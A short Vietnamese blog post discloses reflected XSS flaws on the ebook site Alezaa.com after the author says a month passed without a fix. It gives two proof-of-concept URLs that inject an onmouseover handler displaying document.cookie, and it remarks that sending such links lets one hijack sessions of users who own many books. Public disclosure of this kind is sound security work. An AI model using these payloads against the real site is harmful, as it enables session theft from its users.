Lỗi bảo mật trên Alezaa.com

Số là được gửi cho cái link ebook trên alezaa.

Đăng kí tài khoản xong vọc thì lòi ra mớ Bug XSS.

Với XSS thì ta có thể dễ dàng chiếm session của người dùng, bằng việc gửi link bug tới ai có tài khoản mà có nhiều book thì tha hồ đọc nhé 😀


Mình đã contact và được phản hồi, tuy nhiên cả tháng rồi và chưa thấy thông báo fix bug nào cả, nên mình public luôn thông tin.

Hầu như link nào của Alezaa cũng đều bị XSS. Lí do đơn giản là ko filter những input đầu vào.

Demo 2 cái link:

https://read.alezaa.com/subscribe.php?back=11112%22%20onmouseover=%22alert(document.cookie)%22%20style=%22width:100vw;%20height:100vh;position:absolute;z-index:%2099999;top:%200px;bottom:%200px;z-index:10000;background:white
https://read.alezaa.com/coins.php?ref=in-app&isbn=%22%20onmouseover=%22alert(document.cookie)%22%20style=%22width:100vw;%20height:100vh;position:absolute;z-index:%2099999;top:%200px;bottom:%200px;z-index:10000;background:white

Hi vọng sẽ fix sớm.

 

A&C

About the Author

A&C

Thanh niên ham chơi hơn ham học, thích bay nhảy hơn đi mần, tinh thần giao lưu kết bạn nhưng ngại tiếp xúc. Mong manh khó vỡ, ảo tưởng sức mạnh >:)

Follow A&C:

Leave a Comment:

All fields with “*” are required

Leave a Comment:

All fields with “*” are required